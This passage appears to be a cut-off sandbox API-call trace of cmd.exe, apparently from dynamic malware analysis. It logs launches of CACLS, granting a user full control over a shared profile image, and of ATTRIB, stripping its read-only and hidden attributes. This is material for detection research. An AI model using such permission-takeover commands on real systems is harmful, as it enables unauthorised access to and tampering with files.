13 [0188.132] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0188.132] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0188.132] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0188.132] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0188.132] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0188.132] GetEnvironmentStringsW () returned 0x2f2458* [0188.133] FreeEnvironmentStringsW (penv=0x2f2458) returned 1 [0188.133] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.133] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0188.133] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0188.133] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0188.133] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0188.133] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0188.133] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0188.133] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0188.133] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0188.133] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0188.133] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f980 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0188.133] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f980, lpFilePart=0x18f97c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f97c*="Desktop") returned 0x18 [0188.133] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0188.133] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f6fc | out: lpFindFileData=0x18f6fc) returned 0x2f0ae8 [0188.133] FindClose (in: 
hFindFile=0x2f0ae8 | out: hFindFile=0x2f0ae8) returned 1 [0188.133] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f6fc | out: lpFindFileData=0x18f6fc) returned 0x2f0ae8 [0188.133] FindClose (in: hFindFile=0x2f0ae8 | out: hFindFile=0x2f0ae8) returned 1 [0188.133] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f6fc | out: lpFindFileData=0x18f6fc) returned 0x2f0ae8 [0188.134] FindClose (in: hFindFile=0x2f0ae8 | out: hFindFile=0x2f0ae8) returned 1 [0188.134] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0188.134] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0188.134] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0188.134] GetEnvironmentStringsW () returned 0x2f0308* [0188.134] FreeEnvironmentStringsW (penv=0x2f0308) returned 1 [0188.134] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0188.134] GetConsoleOutputCP () returned 0x1b5 [0188.134] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0188.134] GetUserDefaultLCID () returned 0x409 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fac0, cchData=128 | out: lpLCData="0") returned 2 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fac0, cchData=128 | out: lpLCData="0") returned 2 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fac0, cchData=128 | out: lpLCData="1") returned 2 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, 
lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0188.135] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0188.136] GetConsoleTitleW (in: lpConsoleTitle=0x2e09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.136] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0188.136] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0188.137] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0188.137] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0188.137] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0188.138] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0188.138] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0188.138] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0188.138] 
_wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0188.138] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0188.138] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0188.138] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0188.140] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0188.140] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0188.140] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0188.141] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0188.141] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0188.141] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0188.141] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0188.143] GetConsoleTitleW (in: lpConsoleTitle=0x18f754, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.182] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0188.182] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0188.182] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0188.182] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0188.182] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0188.182] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0188.182] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0188.182] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0188.182] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0188.182] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0188.182] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0188.182] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0188.182] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0188.182] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0188.182] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0188.182] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0188.182] _wcsicmp 
(_String1="CACLS", _String2="MKDIR") returned -10 [0188.182] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0188.182] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0188.182] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0188.182] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0188.182] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0188.182] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0188.182] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0188.182] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0188.182] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0188.182] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0188.182] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0188.182] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0188.182] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0188.182] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0188.182] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0188.182] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0188.182] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0188.182] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0188.182] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0188.182] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0188.182] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0188.182] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0188.182] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0188.182] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0188.182] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0188.182] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0188.182] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0188.182] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0188.182] 
_wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0188.183] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0188.183] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0188.183] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0188.183] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0188.183] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0188.183] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0188.183] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0188.183] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0188.183] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0188.183] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0188.183] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0188.183] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0188.183] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0188.183] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0188.183] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0188.183] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0188.183] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0188.183] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0188.183] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0188.183] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0188.183] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0188.183] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0188.183] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0188.183] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0188.183] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0188.183] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0188.183] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0188.183] _wcsicmp (_String1="CACLS", _String2="START") returned -16 
[0188.183] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0188.183] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0188.183] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0188.183] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0188.183] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0188.183] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0188.183] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0188.183] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0188.183] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0188.183] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0188.183] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0188.183] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0188.183] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0188.184] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0188.184] SetErrorMode (uMode=0x0) returned 0x0 [0188.184] SetErrorMode (uMode=0x1) returned 0x0 [0188.184] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2f1e98, lpFilePart=0x18f274 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f274*="Desktop") returned 0x18 [0188.184] SetErrorMode (uMode=0x0) returned 0x1 [0188.184] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.184] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0188.189] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.190] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x18eff0) returned 0xffffffff [0188.190] GetLastError () returned 0x2 [0188.190] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0xffffffff [0188.190] GetLastError () returned 0x2 [0188.190] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0x2f2180 [0188.190] FindClose (in: hFindFile=0x2f2180 | out: hFindFile=0x2f2180) returned 1 [0188.190] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0xffffffff [0188.191] GetLastError () returned 0x2 [0188.191] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0x2f2180 [0188.191] FindClose (in: hFindFile=0x2f2180 | out: hFindFile=0x2f2180) returned 1 [0188.191] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0188.191] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0188.191] GetConsoleTitleW (in: lpConsoleTitle=0x18f4e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.191] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f370, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f438 | out: lpAttributeList=0x18f370, lpSize=0x18f438) returned 1 [0188.191] UpdateProcThreadAttribute (in: lpAttributeList=0x18f370, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f430, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f370, lpPreviousValue=0x0) returned 1 [0188.191] GetStartupInfoW (in: 
lpStartupInfo=0x18f32c | out: lpStartupInfo=0x18f32c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0188.191] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0188.192] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f3cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f418 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x18f418*(hProcess=0x50, hThread=0x4c, dwProcessId=0x80c, dwThreadId=0x9c4)) returned 1 [0188.195] CloseHandle (hObject=0x4c) returned 1 [0188.195] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0188.195] GetEnvironmentStringsW () returned 0x2f0308* [0188.195] FreeEnvironmentStringsW (penv=0x2f0308) returned 1 [0188.195] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0188.454] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18f30c | out: lpExitCode=0x18f30c*=0x0) returned 1 
[0188.454] CloseHandle (hObject=0x50) returned 1 [0188.454] _vsnwprintf (in: _Buffer=0x18f454, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f318 | out: _Buffer="00000000") returned 8 [0188.454] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0188.455] GetEnvironmentStringsW () returned 0x2f2410* [0188.455] FreeEnvironmentStringsW (penv=0x2f2410) returned 1 [0188.455] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0188.455] GetEnvironmentStringsW () returned 0x2f2410* [0188.455] FreeEnvironmentStringsW (penv=0x2f2410) returned 1 [0188.455] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f370 | out: lpAttributeList=0x18f370) [0188.455] GetConsoleTitleW (in: lpConsoleTitle=0x18f754, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.455] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.455] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0188.455] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.455] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0xffffffff [0188.456] GetLastError () returned 0x2 [0188.456] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0xffffffff [0188.456] GetLastError () returned 0x2 [0188.456] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x18eff0, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0x2ee4d8 [0188.456] FindClose (in: hFindFile=0x2ee4d8 | out: hFindFile=0x2ee4d8) returned 1 [0188.456] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0xffffffff [0188.456] GetLastError () returned 0x2 [0188.456] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0x2ee4d8 [0188.456] FindClose (in: hFindFile=0x2ee4d8 | out: hFindFile=0x2ee4d8) returned 1 [0188.457] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0188.457] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0188.457] GetConsoleTitleW (in: lpConsoleTitle=0x18f4e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.457] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f370, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f438 | out: lpAttributeList=0x18f370, lpSize=0x18f438) returned 1 [0188.457] UpdateProcThreadAttribute (in: lpAttributeList=0x18f370, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f430, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f370, lpPreviousValue=0x0) returned 1 [0188.457] GetStartupInfoW (in: lpStartupInfo=0x18f32c | out: lpStartupInfo=0x18f32c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0188.457] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0188.457] CreateProcessW (in: 
lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f3cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f418 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"", lpProcessInformation=0x18f418*(hProcess=0x4c, hThread=0x50, dwProcessId=0xc4, dwThreadId=0x7f4)) returned 1 [0188.458] CloseHandle (hObject=0x50) returned 1 [0188.458] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0188.458] GetEnvironmentStringsW () returned 0x2f2410* [0188.459] FreeEnvironmentStringsW (penv=0x2f2410) returned 1 [0188.459] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0188.516] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x18f30c | out: lpExitCode=0x18f30c*=0x0) returned 1 [0188.516] CloseHandle (hObject=0x4c) returned 1 [0188.516] _vsnwprintf (in: _Buffer=0x18f454, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f318 | out: _Buffer="00000000") returned 8 [0188.516] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0188.516] GetEnvironmentStringsW () returned 0x2f2410* [0188.516] FreeEnvironmentStringsW (penv=0x2f2410) returned 1 [0188.516] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0188.516] GetEnvironmentStringsW () returned 
0x2f2410* [0188.516] FreeEnvironmentStringsW (penv=0x2f2410) returned 1 [0188.516] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f370 | out: lpAttributeList=0x18f370) [0188.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.516] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0188.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.516] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0188.517] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.517] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0188.517] SetConsoleInputExeNameW () returned 0x1 [0188.517] GetConsoleOutputCP () returned 0x1b5 [0188.517] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0188.517] SetThreadUILanguage (LangId=0x0) returned 0x409 [0188.517] exit (_Code=0) Process: id = "404" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c40" os_pid = "0x80c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "403" os_parent_pid = "0x84c" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27353 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27354 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = 
